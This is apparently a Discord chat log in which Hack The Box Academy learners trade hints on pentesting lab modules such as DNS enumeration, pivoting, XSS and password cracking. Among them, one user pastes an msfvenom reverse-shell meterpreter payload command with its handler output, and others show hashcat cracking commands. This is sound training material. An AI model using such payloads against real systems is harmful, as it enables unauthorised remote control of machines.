#modules

1 messages · Page 72 of 1

half inlet
#

I don’t entirely understand what I’m trying to find it’s a confusing question 😭

thorn urchin
#

lets rewind a bit. what's the exact question youre working on

fathom pendant
#

Also with this module you'll get trailing a trailing '.' on the fqdn it's weird

coral sundial
#

Yes. FDQN requires .

fathom pendant
fathom pendant
#

That's why I phrased it that way

crisp girder
#

hey guys i am back

acoustic owl
#

What exactly do you want to know?

coral sundial
#

Just memories from my windows domain days about 20 years ago

thorn urchin
#

okay so @half inlet do you know what the DNS server is for the domain

half inlet
#

How do I answer that? The ip for it?

thorn urchin
#

no do you personally know what it is

half inlet
#

I don’t understand really

fathom pendant
#

What is a DNS server. What does it do

half inlet
#

It converts ip to domain and vice versa

thorn urchin
#

and what dns record is responsible for identifying the dns server of a domain

half inlet
#

Ohhh NS?

crisp girder
#

guys i said hello i am back !!

half inlet
#

Oh I think I understand

thorn urchin
#

sure

fathom pendant
#

I believe the section does actually go into a bit of detail about the different record types

thorn urchin
half inlet
#

Oh I got it!!! So ns.inlanefreight.htb is the server that I’m contacting when I’m looking for the ip for inlanefreight.htb?

fathom pendant
#

This is why taking notes is recommended :) we can't commit all of everything to memory

crisp girder
#

no problem mate i have 8 other accounts

half inlet
#

I took@notes I just really don’t understand it 😭

fathom pendant
#

Ooh ban evasion

#

Ah then you need to take better notes: to take good notes you need to rewrite things in your own words

thorn urchin
half inlet
#

I didn’t understand the difference between a domain and a dns server

fathom pendant
#

The way that makes the most sense to you

half inlet
#

Ah

fathom pendant
#

A domain is just an area

half inlet
#

But a DNS is a server that holds mappings between domains and ips?

thorn urchin
#

basically

half inlet
#

I understand now

thorn urchin
#

and some other tidbits

half inlet
#

I thought the inlanefreight.htb was the DNS server

#

(The target it gave me)

fathom pendant
#

Nope that's just the domain

thorn urchin
#

thats just thr domain

half inlet
#

Ah okay

thorn urchin
#

inlanefreight.htb doesnt even need to have its own IP even

#

its just an abstract thing

half inlet
#

I understand now I think

acoustic owl
thorn urchin
#

most places in real life simply default redirect the domain name alone to their main webserver

static roost
#

Module: Linux Local Privilege Escalation - Skills Assessment
Anyone get a shell WITHOUT using SSH credentials?

thorn urchin
fathom pendant
half inlet
#

Thank you guys! I understand that now; I’m having some issues with the last two questions but that’s about all the time I have for today so I’ll look back at it tomorrow after some rest and see if I can do better

static roost
#

@thorn urchin dying for hint

thorn urchin
static roost
#

Everything short of bruteforcing potential URL paths with ffuf.

thorn urchin
#

and have you found anything of interest

#

any services or web apps that pop out?

static roost
#

Yea I found a lot of interesting stuff. A few apps and a service besides SSH. Im on the pentester path so I've done ALL modules up to this point; exhausted all my notes except like I said just blasting everything with FFUF.

thorn urchin
#

tell me specifically what stuff pops out as potentially interesting to you

static roost
#

I feel like I should PM you at this point. Don't wanna drop significant spoilers.

thorn urchin
#

sure

mystic light
#

ping is not a port based protocol, and wont be able to tunnel with proxychains as used in this module.

honest ridge
#

@mystic light im lost.... any hints?

mystic light
hollow finch
#

I get nothing but denial of permission issue when attempting the procedure on Laudanum exercise...anyone else have this issue?

rustic sage
#

Good evening. I have just started and joined HTB Academy. In the first tutorial (INTRODUCTION TO ACADEMY) => Interactive Section with Terminal.

Question: Based on the commands you executed, what is likely to be the operating system flavor of this instance? (case-sensitive)

This is the result i found from the terminal: Linux htb-unoo8iw33g 6.0.0-12parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.12-1parrot1 (2023-01-12) x86_64 GNU/Linux

And My answer was: Debian 6.0.12-1parrot1 but it says it is incorrect

honest hazel
#

what flavor of linux is that

fathom pendant
#

Google: Linux flavors

honest hazel
#

I was responding to mgbaraka1, probably should have hit reply

fathom pendant
#

Well yes but I'm also responding with something that will also lead to an answer

rustic sage
#

well, it should be Debian. but it says wrong answer 😦

#

thank you guys the answer is Parrot.

elfin nacelle
#

Web Attacks - Skills Assessment

Note: I already got the flag using another method.

I just wanted to understand why XXEinjector doesnt work for this.
Can someone please explain?

cyan plume
#

Hello Everyone

fathom pendant
cyan plume
cyan plume
#

not a huge fan of parrot or tails honestly. tried them both. been awhile since ive been on parrot though

cyan plume
#

@bronze plover parrot and tails are "os" or operating systems

#

@bronze plover tails is used for anonymity. parrot is more for a cybersecurity

fathom pendant
#

and #welcome on how to access other channels

fathom pendant
#

<@&861185840277487616>

novel matrix
#

thanks

#

dealt with

fathom pendant
#

<3

small raptor
#

Hi, could anymore point me towards the right direction with the question "submit the administrators hash" in the windows priv esc section Pillaging. I was able to get the file I need for the hash. but samdump2 returns an error trying to read the file.

dim hound
#

Rule #7

gaunt scaffold
nova ocean
#

Hello guys there is a module using web proxies, i am trying to unlock, from outside before unlock it say 20 cubes, when i press unlock it says 100 cubes?

acoustic owl
#

Presumably the 20 cubes are the ones you get back after completing the module.
With each module you get back 1/5 of the cubes

Here is an example from another module
Number of cubes (circled in yellow) that the module costs.
Above the number of cubes you get back.

burnt wadi
#

So for us to keep on going in htb challenges sooner or latter it is needed to buy cubes?

#

@acoustic owl

autumn pilot
#

Yes

burnt wadi
#

Okkk!!

I had that feeling from the start

#

But its a great way to spend the cash

acoustic owl
burnt wadi
#

Aint, but thank you

Its worth for the certificate they give

#

Do you have idea how valuable it is when searching for job? Htb cert

acoustic owl
#

If you want a certificate that you can use for job search, then probably OSCP is currently more suitable.
If you want good training, then the Academy is the right place for you.

nova ocean
#

can i subscribe for student and do the cbbh path? or i also have to buy cubes?

Student*

For university and academic institution students

Direct access to all modules up to (including) Tier II

  • Unlimited Pwnbox usage
  • CPE credits submission
#

I think yes most of them are tier 0,1,2 there is no other so 8$ a month is way better than buying cubes or subscription at the end u have to buy exam voucher ;d
so lets say on paper u need for example 2,3 month max to prepare everything, take notes, and practice so its around $16-$24

anyone agree with me?

acoustic owl
#

For the student subscription you need a corresponding email address. If you have one from your university, you can sign up for this subscription.

How long you really need depends on your skills. I consider 2-3 months to be very optimistic.
To pass the exam, you need to understand the attacks discussed in the modules really well and know why they work the way they do.

normal gyro
#

I can not get Firefox to work to be able to spawn a target. What am I doing wrong

normal gyro
#

I can pull up Firefox in the academy to do a module but when I try to open Firefox says something to the affects of Firefox is down

#

I'm doing the free modules I'm in the first one

#

Amd Yes I'm a noob

dim hound
#

screenshot?

quick cloud
#

how long should hard labs take without any hints?

bright hemlock
dim hound
#

That depends on your skills tbh.. sometimes e medium can take longer than a hard one @quick cloud

normal gyro
#

@dim hound I'll send it when I get off work

quick cloud
#

Its normal to spend 6 hours on hard lab?

dim hound
#

hmnm, I can't really judge. Aslong you learned from it and make notes. So, when you encounter again in a similar environment you should be able to solve it in a short time period.

quick cloud
#

ok

#

I need a hint for Footprinting - Hard I have a shell for the user but I cant find the HTB password

silent knoll
#

Can anybody help me with the XSS - Skills Assessment?
I already set up my php server and send all the payloads i found from the module through the webform but i dont get any response on my http server

dim hound
#

@silent knoll pm me with your XSS payload that you are trying to use

burnt sluice
#

Module: Pivoting
Section: SocksOverRDP
issue:
i have uploaded all files as required, i setup the tunnels.
i have connected to the first target, but when i try to connect to the second target, the rdp session freezes.
for more context:
||i have found that the account jason is a L**** account|| so I tried to RDP with the prefix of that account, worked out well, didn't get the error message about ||not being in the domain||, now my issue is that I can't seem to establish the rdp session.

#

nvm there was sth with the connection

#

i tried again several times and everything was alright

fathom pendant
#

Yeah the pivoting ones sometimes the connection is weird.

nova ocean
acoustic owl
#

HTB gives 18 days a 8h for the path.
As I said, I think that is very sporty

crimson walrus
#

Hi everyone. I am having a lot of trouble with the SOCKS5 Tunneling with Chisel chapter of the port forwarding module.
So the thing is that when I compile chisel, transfer it over to the pivot and run it from there, I get an error that "GLIBC_2.32 is not found". I tried using an older version of chisel (1.7.4) and I got the same result. If anyone can help, I'd be very grateful.

crimson walrus
balmy lion
#

hello,

does anyone know if there is a known issue on AD Enumeration & Attacks - Skills Assessment Part II with importing the PowerView.ps1 module? Im on ||MS01 with elevated privileges|| but I cannot get it to work, seemingly it imports but then none of the commands do anything (no error message either) (ActiveDirectory module does not load either)

dim hound
#

I remember that I used a older version in order to get it to work. I don't specially recall which version. @crimson walrus

dim hound
#

Yup

steep cosmos
#

Does anyone have Hack the box exhibition ctf acces key ?

rotund urchin
#

I am working on the DNS footprinting module and I am not sure what wordlist to use to find the FQDN of a subdomain. I have tried like 10 wordlists to bruteforce, can anyone nudge me to the right list?

crimson walrus
# dim hound Yup

Hey, sorry to bother you man but I tried every possible version of chisel (down to 1.3.0 since earlier versions cannot be built with "go build"). Is there any tips you could give me as to why it may not be working? I don't think my problem is the version itself since the error does not change regardless of which version I use.

dim hound
#

I don't have in my notes, which specific version I used. But I remember that I had to use a older version

nova ocean
acoustic owl
#

1 day = 8 hours

#

But this time frame depends very much on your knowledge

crimson walrus
nova ocean
#

I think i will be ok thank u

acoustic owl
# nova ocean I am top 500 on htb

CBBH is a web-only pentest and has nothing directly to do with the machines on HTB. You have to search for bugs in web applications and have to exploit and report them.

nova ocean
#

I know already have exp in both anw thank u

#

Have u done the exam?

acoustic owl
#

yes

nova ocean
#

How was it?

#

I sent u pm instead spamming here

acoustic owl
#

From my point of view it was hard
Maybe this video will help you
https://www.youtube.com/watch?v=6ISUuMBzCyo

In this video I will share my experience with the CBBH course and exam, as well as some tips I have for people who may be interested in taking it.

Chapters:
0:00 Introduction
0:19 Course: Format & Content
2:31 Course: Duration
3:05 Course: Pwnbox
3:33 Course: Pricing
4:22 Exam: Format & Content
5:09 Exam: Duration
5:59 Exam: Report
7:49 Exam: F...

▶ Play video
nova ocean
#

I will check it

sly nebula
#

Module "ADVANCED SQL INJECTIONS", Section "Error-Based SQL Injection": I think I have reconstructed the password reset link properly, but it won't be accepted. Could someone sanity check me? Thx!

small steppe
#

Module: USING THE METASPLOIT FRAMEWORK
Section: Payloads
Question: Exploit the Apache Druid service and find the flag.txt file. Submit the contents of this file as the answer.

This isn't even a question about the lesson content or the question really -- Ive managed to successfully push the exploit a few times but there seems to be a network connectivity issue going on. Every time I gain a meterpeter session and grab a shell, the session times out. I ran ping against the target host in a separate tab during my last attempt and sure enough, packet loss jumps intermittently and murders my connection. Is HTB experiencing any networking issues? Ive looked at my home connectivity (no issues there), tried redownloading the VPN file, and resetting the target host (a few times, seems connectivity is okay for about 2 minutes after the reset and then it dies). Please halp.

Edit: Resolved. Connectivity finally stayed stable long enough for me to get the flag.

#

Argh. I keep trying to time my commands with when the target host is responsive -- I was able to run the exploit, get the meterpreter session, grab an interactive shell, find the flag, and literally as I typed "more flag.txt" the mother fluffin' session died before the response was sent back. If there is a god, he hates me eternally.

proud pine
small steppe
#

Sure did.

broken warren
#

Has anyone done session security skill assessment? I cant figure out what to do with the information i acquired, i honestly need like a step by step on what im doing. Or is there a machine with a similar attack that i can learn from.

dim hemlock
#

Hi guys, Im stuck on a module not sure if anyone can help me out:
hashcat --force password.list -r custom2.rule --stdout | sort -u > mut_password.list
clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

  • Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
#

Im getting this error when im trying to use hash

dim hemlock
#

Yeaa

#

I cant find a way to fix it

thorn urchin
#

Pwnbox hashcat is broken right now

#

idk of a workaround

#

gotta use your own station instead of pwnbox sadly

dim hemlock
#

I have already cracked this to be honest Im just revising some work because I was out for a few days

#

But I need the password to move on to the next step sadly

thorn urchin
#

yeah atm just gotta create the list locally

dim hemlock
#

yeaaa doing it now

patent niche
#

Can someone help me in broken-authentication-weak-bruteforce-protections module?

wanton mica
#

Hey guys, for AD Enum & Attacks Skills assessment 2 question 9: Obtain credentials for a user who has GenericAll rights over the domain admins group

Tried using powerview but it isnt working…confused as hell! Any nudges?

small steppe
#

Module: USING THE METASPLOIT FRAMEWORK
Section: Meterpreter
Question: Retrieve the NTLM password hash for the "htb-student" user. Submit the hash as the answer.

Okay. Successfully exploited and currently have system level access to the target host. When I run 'hashdump' in meterpreter it spits out the following error:

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

I tried migrating to a new process just in case that may have been the cause. No success. Any ideas on what I'm missing here?

Edit: Im an idiot. Resolved.

fathom pendant
half inlet
#

How do I get the host name of an IP? Tried using host [ip], but it keeps saying that the host isn’t found

#

I’m on the same problem as yesterday now haha @fathom pendant

#

The question is “What is the IPv4 address of the host name DC1”

#

Getting this with the host command but I used both the ip it gave me, some it said when I dug AXFR records, and even tried 127.0.0.1, but it gives me the same result every time

#

Wait I think

#

I figured it out

#

Nice i got it, I didn’t realize the subdomain name and the host name were the same thing

pseudo ledge
#

Can someone pls help me, I'm stuck on FILE UPLOAD ATTACKS, Whitelist Filters - I found an extension that gets uploaded into the server and yet when I try to access it, I get error 404 (not found)

half inlet
#

Ohhhh wait it’s dc1.internal.inlanefreight.htb so the dc1 is the host but the internal is the subdomain

#

I get it now

fathom pendant
south glen
#

can any body help me with footprinting - smb section last question

#

i m not able to find the full path of the share

#

i already tried enumerating it with rpcclient

fathom pendant
#

Take a look at the filepath it gives you. That looks quite odd for a Windows machine

#

And the samba service is a Linux service

half inlet
fathom pendant
half inlet
#

Alright

south glen
#

i tried with /home/smbuser/

fathom pendant
#

Remember full filepath of the share

south glen
fathom pendant
#

Im not home ATM but let me double check

#

Give me like 20 min to be home

south glen
pseudo ledge
half inlet
#

Neither of which end in 203

fathom pendant
#

Sir

#

Read what I said again

#

Run it against the subdomains

#

Aka the x.inlanefreight.htb

half inlet
#

Ah sorry

#

Got it, thank you

autumn pilot
pseudo ledge
#

it still doesn't work, it keeps returning 404 error code

autumn pilot
#

Then go a step back and verify the extension(s) that you are using are actually uploading a file

#

the server response is usually - "File successfully uploaded" which indicates a 200 response

pseudo ledge
#

I got the following response:
HTTP/1.1 200 OK
Date: Wed, 19 Apr 2023 19:35:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

File successfully uploaded

#

so I assumed it worked

autumn pilot
#

So far so good, now verify where the file is being saved

pseudo ledge
#

according to the section it should be at the /profile_images folder

autumn pilot
#

feel free to investigate

pseudo ledge
#

ok, I'll try finding a different folder

autumn pilot
#

you can use the website's page and devtools (inspect)

pseudo ledge
#

well it seems to be the right folder from what I see when I went into devtools

#

so what else might be the problem?

autumn pilot
#

path, file 🤷

pseudo ledge
#

can I dm you?

autumn pilot
#

sure

zinc marsh
#

someone who completed password attacks

#

i got in the smb

#

but i cannot list the files

manic magnet
#

dm me

half inlet
#

Trying to enumerate a SMTP service on Footprinting module; Used the names they provided in their resources with the smtp-user-enum tool but turning no results 🤔

#

Trying a different list from SecLists now but it might take a while lol

#

It actually may be an issue with how I’m using the tool - I tried to use a user that I know for sure exists but it said no results

#

Anyone know what’s going on here? Im not sure what I did wrong

fathom pendant
#

SMTP is a slow service

#

If you're ever curious about a tool generally doing man <tool> will give you all the available options

half inlet
#

Yeah I tried that haha. Turns out the documentation on the GitHub for the tool is incorrect 😰 it states that to change the initial timeout it is —timeout-init (seconds), but after looking at the tool it is in fact -w

wanton mica
#

Hey guys, for AD Enum & Attacks Skills assessment 2 question 9: Obtain credentials for a user who has GenericAll rights over the domain admins group

Tried using powerview but it isn’t working….tried using bloodhound-python and it also didn’t return anything favorable…completely lost at this point…anyone past this part yet?

steep heron
#

Hi, I'm in the AD Enum & Attacks Skills assessment 1, found the user for the 5th question, also have the ntlm, but cannot crack it. have tried few dictionaries and also brute force. could you help?

steady hawk
steep heron
steady hawk
steep heron
simple zephyr
#

anyone do the Windows Priv Esc Kernal Exploits and get an error with the Metasploit part?

not sure if its the payload I used or maybe just the box.

Payload used

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe
*] Started reverse TCP handler on 10.10.14.214:8443 
[*] Sending stage (200774 bytes) to 10.129.43.13
[*] Sending stage (200774 bytes) to 10.129.43.13
[-] Meterpreter session 1 is not valid and will be closed
[*]  - Meterpreter session 1 closed.
[*] Sending stage (200774 bytes) to 10.129.43.13
[*]  - Meterpreter session 2 closed.  Reason: Died
[*]  - Meterpreter session 3 closed.  Reason: Died
[-] Meterpreter session 2 is not valid and will be closed
quasi wave
#

hi can someone help me with my code on the bash module?

#

This is for the conditional code execution section of BASH scripting module

#
#!/bin/bash
#count number of characters in a variable
echo $variable | wc -c

#variable to encode
var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
    var=$(echo $var | base64)
done

$count = ''

for counter in {1..35}
do
    $count = $count + ${var:$counter - 1:$counter}
done


echo $count{${#counts}}
quasi wave
mystic light
quasi wave
#

Ok thanks

hard dew
#

I have a really stupid DNS question, I feel like i'm missing something. Anyone know why when using NSLOOKUP you get errors and no results. even if I specify the NS i get nothing returned. but if i switch to DIG i get results

#

words to live by, my boss says this all the time lol
it's not DNS
There's no way it's DNS
...
It was DNS

steady hawk
#

You're not specifying the NS in your nslookup command, try nslookup -type=ANY 10.10.34.136 10.129.129.3 ?

patent blaze
#

Sup folks! Hope you're good!

I'm on File Upload Attacks - Client Side Validation.

When I try to use the upload button, I got an error on the dev console saying that file is not defined.

I'm wondering is this is intended or not. Does anybody knwo about that ??

hard dew
steady hawk
#

Ah, i'm not sure then...

hard dew
#

gonna try gobuster see what it comes up with, though the example mentions using patterns and right now all i care about is subdomains, i'm not number matching yet

mystic light
patent blaze
analog tendon
#

hey is anyone available to assist me with file upload attacks module. black list filter section. i was able to find 3 extensions that were accepted by the back end server but none of them seem to run the code. all the others ive tried are not accepted via blacklist

#

actually belay that. i found more extensions

#

got it

hard dew
tawny nest
#

Hello, I'm doing the hard question in footprinting lab. I was able to find the ports ssh, pop3, imap, dhcp and snmp as open. I got the credentials for tom and when I try to ssh using those credentials, I was getting an error like permission denied (public key). Am I on the right track?

fathom pendant
#

that's because ssh requires a publickey for you to access with

#

but maybe his credentials work on a different service

#

:)

#

ssh key for this lab*

tawny nest
#

Thanks

tawny nest
fathom pendant
#

Just because the inbox is empty maybe a folder isn't

tawny nest
#

Everything is showing as Has no children. Maybe I should look again carefully.

fathom pendant
#

Has no children just means there's no subfolder

#

It does not mean empty

tawny nest
#

Okay

#

Thanks

tawny nest
#

Thank you @fathom pendant. Got into the SSH and found the answer.

cinder mortar
#

how do i remove the copyright message from ffuf output

#

ok thanks

tidal mango
#

Is there anyone who can give me a nudge on the Attacking Common Applications LDAP injection section? I am having no luck figuring it out...

abstract fjord
#

hi, i can't access all rdp labs in active directory enumeration and attack module. It was incorrect username or password error w/ provided credentials (htb-student, Academy_student_AD!) . how anyone access it?

fiery berry
rustic sage
#

Hey folks

#

I am still stuck on password attacks hard lab, ||I found hashes and cracked admin's password but still can't use it anywhere.||, I think I have used every tool and method I could think of. Can I dm someone?

autumn pilot
#

Maybe that password is used not only by the admin

modern epoch
#

It's a bit tough, especially the skill assessment but the module is really good! - Advanced Sql Injections done

twilit gull
#

Hey Guys, struck with active directory skills assesment 2 Q7, I'm not sure which credentials to use and which IP to use. I logged in to the msssql using two users BR086 and AB920 but both didn't have permissions to execute a command. Help would be appreciated

rustic sage
autumn pilot
#

if you are the J user, then you have a file that you can use, once you have the file under your control (e.g. can see something inside) that thing can help you get another user

#

that user has certain extension (file) that can be opened containing hashes, that can be cracked

rustic sage
#

Are you referring to L***.kbpx?

autumn pilot
#

yes

rustic sage
#

I have already gone through that stage

autumn pilot
#

and I assume you are trying to log in with that password as someone, right?

rustic sage
brazen timber
#

Hey i want to start on cybersecurity and the channels are a lot and its very overwhelming

autumn pilot
#

so far so good, try to log in

rustic sage
#

that's the issue, it doesn't work, I tried to login via rdp, smb and locally

autumn pilot
#

what about winrm?

rustic sage
#

it didn't work too

#

secretsdump as well

autumn pilot
#

I'm pretty confident that winrm works

#

Either you have a wrong password, or you are not submitting the password correctly

#

nope

rustic sage
# autumn pilot nope

so what am I supposed to do with these sam files if the cracked password doesn't work?

autumn pilot
#

use a different wordlist maybe?

rustic sage
#

hmm, I have used 2 the one that was given and rockyou

autumn pilot
#

perhaps the administrator had a mutated keyboard

rustic sage
#

yeah I tried a mutated list

autumn pilot
#

keep trying, the password that you mentioned is not the correct one

rustic sage
#

okay I will dig it again

crimson walrus
#

Hi guys. I need help with the ICMP Tunneling with SOCKS part of the pivoting module.
It has come to my attention that many of the tools showcased in this module do not work properly or need a lot of fine tuning to work properly. The problem I have rn is with the ptunnel-ng tool. Running the script autogen.sh does not work I cannot find a way to build the executable on my Kali. I read online that a solution would be to get an old Linux mint (maybe also other distros) and run it from there. I have no idea if that will work. Before I go down the rabit hole of installing different VMs and setting them up just to get this tool to work, does anyone have any tips? I have already spent quite some time on this module and any tips that could cut the trial and error time would be much appreciated! PepeProtecc

fathom pendant
#

Just use a different pivot method. Thats legit the only tool that I didn't bother with

crimson walrus
#

Thanks!

summer prism
#

Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.

While using ODAT, i keep on getting new SID everytime i run the scann

fathom pendant
#

You are given a user to work with for starters

#

Just follow that section to a T

summer prism
fathom pendant
#

Look carefully you get a 'username/password' combo

summer prism
#

Aah, thankyou j went thru everything again

fathom pendant
#

Ye

#

And that section you can literally follow all the steps it tells you :)

summer prism
#

i overcomplexed it way too much honestly

fathom pendant
#

Yep

#

The enum part is literally using sqlplus

rustic sage
autumn pilot
#

why are you mutating rockyou

rustic sage
#

I didn't

#

I mutated the given password list with it's rules

autumn pilot
#

the first and the second post will not help you much, but to see the hashcat mode that you need

#

the admin ntlm hash is crackable

#

unless, the script you are using to extract the hashes is giving you false positives

kind holly
rustic sage
#

can I paste the hash for a quick moment @autumn pilot ?

kind holly
#

can anyone help me to solve this questions from windows fundamentals -----Find the SID of the bob.smith user

autumn pilot
#

Feel free in a dm

kind holly
kind holly
kind holly
dawn parrot
#

i am on live engagement in shells and payload and doing host-1 and password for tomcat is ||Tomcatadm|| (it was given in the hint). and this is not an default credential. so i could not have done this without viewing the hint. right? am i missing something?

rustic sage
dawn parrot
#

i guess i am blind LUL thx btw

rustic sage
#

happens, no worries

#

I have completed that module so if you get stuck anywhere, feel free to dm me

unique topaz
#

Hello

#

I'm a newbie

#

I'm searching for someone who's gonna guide me to become a good hacker

dim hound
#

Google can be your best guide ; )

unique topaz
#

I'm searching for a teacher, i will be his/her disciple

acoustic owl
dim hound
unique topaz
#

Thanks❤️

kind holly
dim hound
#

hahaha lol

fathom pendant
kind holly
fathom pendant
#

It depends

#

ChatGPT can be confidently incorrect if documentation is incorrect

dim hound
fathom pendant
#

Not to mention if you want 24/7 access, you need to pay for it

#

Google is free 24/7

#

Also videos can do a better job at explaining than text

#

Especially ippsec videos

unique topaz
#

Thanks, I'm very glad for your help

#

I promise to be a fast learner and join you, and I may message some of you if i don't understand one or two things 🙏

woeful ermine
#

google is a pile of garbage

#

you should know exactly what you are looking for

fathom pendant
unique topaz
kind holly
fathom pendant
#

Idk bro haven't done that

kind holly
#

no bro , i am litttle bit confused

kind holly
fathom pendant
#

I believe you need to replace "win32_userprofile" with the username you have

fathom pendant
#

¯_(ツ)_/¯

acoustic owl
kind holly
zinc marsh
#

someone who completed password attacks?

#

i dont know why im getting this error using hashcat

#

``clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

  • Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.``
#

am using this command

#

hashcat --force password.list -r rule.list --stdout | sort -u > mut.txt

bright hemlock
#

trying to do the skills assessment on file inclusion and RCE. i'm no longer able to see the logs being updated after reaching the "admin" part of the assessment. anyone else have this problem? nevermind - reset fixed it.

misty cedar
#

Alright. I've tried for 3 days... a brother needs help

#

I'm on the PenTest Path and on Footprinting - DNS
currently stuck on 2 questions:
" Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain."
and
"What is the FQDN of the host where the last octet ends with "x.x.x.203"?"

Now I'm seeing on forums that they updated a /etc/host file and I'm missing the point to even doing so when the files are no where to be found.
Assuming I have to make that directory but It still doesnt explain the configuration section

verbal kraken
#

hello everyone

#

im trying to use nc to listen on port 80 but it keeps on quitting

#

how do i fix it?

fiery berry
verbal kraken
#

idk

#

how do i check that?

fiery berry
#

netstat -tpnl

verbal kraken
#

there is no program name

fiery berry
#

I think to see the process you need to have root priv. Anyway can you do a curl on that address?

#

it may be a python simple server or apache, mine it's just a guess

verbal kraken
autumn pilot
#

use a different port, 80 is occupied by a service

verbal kraken
#

i need this port cuz im listening on http

fiery berry
autumn pilot
#

you can use a different one

verbal kraken
#

how will i listen on http then?

fiery berry
autumn pilot
#

depends on what you are trying to accomplish

#

there are python modules, php, npm and so on

verbal kraken
#

i just want to set up a listener

autumn pilot
#

you can setup the listener on whichever port you wish as long as it is not occupied

fathom pendant
verbal kraken
#

im in the xss module in the phishing section

#

i cant use another port

autumn pilot
#

what makes you think that

verbal kraken
#

cuz http is on port 80?

autumn pilot
#

so, basically you are assuming that the bot will visit only http?

verbal kraken
#

is there a way i can kill the process?

verbal kraken
autumn pilot
#

i wouldn't recommend killing the process on port 80

misty cedar
#

but that failed

fathom pendant
#

But a subdomain would be x.inlanefreight.htb

#

But the first question; how do you query for a Name Server

misty cedar
fathom pendant
#

There is a subdomain you can use with dnsenum and the "fierce" wordlist to get the x.x.x.203

#

If you put the IP in your /etc/hosts it messes up dig

misty cedar
#

I feel like its the root subdom and im being an idiot.

fathom pendant
#

Nope

#

You're missing something obvious

rustic sage
#

I have found the password for mssqlsvc user on attacking sql databases section but I am not able to login. I tried logging in using available clients in Linux and also the microsoft sql studio. Any hints where should I look for?

fathom pendant
#

Maybe it's not accessible from outside the users network

rustic sage
#

was that for me MarcieLee?

fathom pendant
#

Yes

rustic sage
#

Thanks for hint, I will see what I can do

fathom pendant
#

It's been a moment since I did that one

#

And not home to assist further

autumn pilot
rustic sage
acoustic owl
fathom pendant
#

Because the forums

#

Are dumb

misty cedar
#

^^^

fathom pendant
#

Btw if you are adding a DNS server, it wouldn't be the /etc/hosts

#

I know I had to create my own service to reset the DNS BC for SOME reason that file wants to yeet itself off my system

acoustic owl
# fathom pendant Are dumb

There are obviously many people who do not understand how DNS works. Maybe we should write our own module for this....

misty cedar
#

but the lessons arent as much help either IMO. that or Im having trouble understanding everything

fathom pendant
#

The lesson is fine, it's just you're overlooking something

#

This section does not require the adding of IPs to your /etc/hosts.

acoustic owl
fathom pendant
#

Fair

fallow nymph
#

Anyone please help me

acoustic owl
fathom pendant
#

Take a step back; what does DNS stand for

misty cedar
#

Domain name service

acoustic owl
#

Remember that you can configure zones to allow zone transfer only from certain servers

fathom pendant
#

I'll let bunny take over here lol I'm at work

misty cedar
acoustic owl
#

I am at home and have time off.
So lets go

misty cedar
#

BET

#

ok so If we're thinking about configuring zones. we need to do the dig axfr command for a transfer

#

or am I wrong

acoustic owl
#

@misty cedar wrote me a DM, so we do not spoil too much here

misty cedar
#

ok ok

verbal kraken
autumn pilot
#

yes, don't use port 80

verbal kraken
#

omg

#

doesnt work

#

the section itself says i have to use port 80

fathom pendant
verbal kraken
fathom pendant
#

That's just an example

rustic sage
verbal kraken
#

i did

fathom pendant
#

Well if they're running a web service (like nginx or Apache) then it's already bound

rustic sage
fathom pendant
#

You can also try using 8080

verbal kraken
verbal kraken
#

its not getting anything

fathom pendant
verbal kraken
fathom pendant
#

You're using pwnbox yes?

verbal kraken
#

yeah

fathom pendant
#

Ah

#

That's why

#

Port 80 is what's being used to forward the request to the browser for you to use pwnbox

verbal kraken
#

what am i supposed to do then?

fathom pendant
#

Can you change the payload to use a different port?

verbal kraken
#

i think it worked

#

it did

#

thanks

#

@fathom pendant

#

i cant believe i couldn't think of this😅

fathom pendant
#

No problem, you were looking at the problem the wrong way :)

shadow canopy
tender shuttle
#

Hey guys, I've been struggling with taking notes while learning, and I've been curious about how you all approach note-taking and structuring everything.

#

any resources for taking pentesting note effectively?

verbal kraken
#

i personally use notion for my notes

#

i write stuff in a way i can understand later

rustic sage
#

I used gitbook for a while and took notes as I learned and saved them directly into gitbook which became dull and problematic. You need one notebook to keep note of everything you do such as trial and error during solving a challenge and then later you need to transfer notes and organize them into a more readable structure like gitbook.
This way you learn a thing or two and don't miss things when organizing.

#

I used cherrytree for trial and error

acoustic owl
coral sundial
#

I'm an Obsidian man myself. However - Quick one - I'm just trying to finish off the Login Brute Forcing module (Skills Assessment - final Service piece)but it keeps kicking me out or stopping because of too many errors - Any ideas? Also down to take hours for each attempt.

fathom pendant
#

Try limiting your attempts to x per minute

#

Or something like that

coral sundial
#

I'm using -t 4 and I've now resorted to single username and password file so it at least finishes.

#

I'll see what happens. - cheers @fathom pendant

#

I'm just rubbish at multitasking so end up watching the terminal 😉

turbid tartan
#

AD Enumeration and Attacks was a fight but hella good module

rustic sage
sick mural
#

#Getting started Module: I am trying to run the privledge esculatino script LinEnum.sh with proper +x permissions set but its not getting me any output neither on the attack box nor on victim machine. Can some one guide what could be the issue. The script gets executed but no putput or error is received. I have cloned the scripted from github .

untold moss
#

Hi !
It seems I have a problem on the Academy module 'Attacking web applications with Ffuf'
I have locked one of the answers and the Submit button stays grayed out and it doesn't validate.

fathom pendant
#

If you hit submit and it turns green... Then it was correct lol

untold moss
#

What I'm saying is, i can't validate anymore. Can't change the text in the textbox.
It's as if the answer is correct, but it doesn't turn green

fathom pendant
#

... sir

#

Listen carefully

#

It is submitted already

#

It is correct

#

It will not let you make changes

#

Because it is submitted and correct

untold moss
#

Forgot to mention that the main issue is that it didn't validate the chapter

#

Yet as you say the answer is correct

fathom pendant
#

Refresh page

untold moss
#

Tried that, also tried logging out / in

flat minnow
#

Hey, at password attacks module, at password mutations section I can't get the flag as the target disconnects before the attack finishes. Any suggestion on how to cope with that?

untold moss
#

😦

fathom pendant
#

Then contact support in the bottom right if you don't get credit after finishing the rest of the module

fathom pendant
#

Also you should be mutating the password.list based on the custom.rule in the resources

#

